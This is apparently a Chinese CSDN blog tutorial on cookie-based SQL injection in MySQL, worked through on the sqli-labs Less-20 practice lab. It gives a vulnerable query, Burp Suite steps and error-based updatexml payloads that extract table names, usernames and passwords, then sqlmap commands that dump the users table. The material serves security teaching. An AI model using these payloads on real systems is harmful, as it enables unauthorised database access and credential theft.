MySQL cookie注入

本文详细解析了MySQL cookie注入漏洞的形成过程,通过实例展示了如何利用注入漏洞进行SQL操作,包括爆破数据库、数据表和字段,以及使用sqlmap工具的安全测试。重点介绍了利用'or'和'updatexml'技巧进行信息窃取。
摘要由CSDN通过智能技术生成

MySQL cookie注入

1.cookie介绍

服务器可以利用cookie包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。cookie最典型的应用是判定注册用户是否已经登录网站。

用户可能会在一段时间内在同一网站的不同页面中选择不同的商品吗,这些信息都会写cookie,以便在最后付款时提取信息。

我们按下F12,选择控制台,在命令行中输入document.cookie,回车即可得到我们本地的cookie
在这里插入图片描述

2.cookie注入代码分析

代码中使用cookie传递参数,但是没有对cookie中传递的参数进行过滤操作。导致SQL注入漏洞的产生。
在这里插入图片描述
用户传入进来的cookie,是可控的,并且还可以执行SQL语句

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

我们可以闭合前面的单引号,然后执行我们想要执行的SQL语句

3。cookie注入利用

我们以sql-lab-less20为例
1.输入用户名和密码进行抓包
在这里插入图片描述
2.发送到repeatergo,查看response,点击Follow redirection
在这里插入图片描述
3.返回到Proxy
在这里插入图片描述

4.点击Forward进行两次放包
在这里插入图片描述
5.可以看到此时的cookieuname=admin,我们还是重复上面的操作,将数据包发送至Repeater
在这里插入图片描述
6.go一下,查看返回的数据
在这里插入图片描述
7.在用户名后面加上反斜杠,查看报错信息
在这里插入图片描述

8.利用’ or 1=1 --+输出第一个用户名和密码。
在这里插入图片描述
9.爆破数据库

' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

在这里插入图片描述
10.爆破数据表

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+

在这里插入图片描述
我们要的是users表,因此,往后依次爆破即可

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+

在这里插入图片描述
12.爆破字段名

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) --+

在这里插入图片描述
14.有爆字段可知,此处有三个字段,我们只需,以此爆破即可,而我们关注的是用户名和密码

获取用户名信息

' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+

在这里插入图片描述
获取密码信息

' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+

在这里插入图片描述

4.sqlmap安全测试

sqlmap cookie注入
1.抓取数据包,并且在cookie后面加上星号(*)
在这里插入图片描述
2.cookie注入渗透测试

python2 sqlmap.py -r "1.txt" --level 3 --batch

在这里插入图片描述
3.爆破数据库

python2 sqlmap.py -r "1.txt" --level 3 --batch --dbs

在这里插入图片描述
4.爆破数据表

python2 sqlmap.py -r "1.txt" --level 3 --batch -D security --tables

在这里插入图片描述
5.爆破字段及内容

python2 sqlmap.py -r "1.txt" --level 3 --batch -D security -T users --dump

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值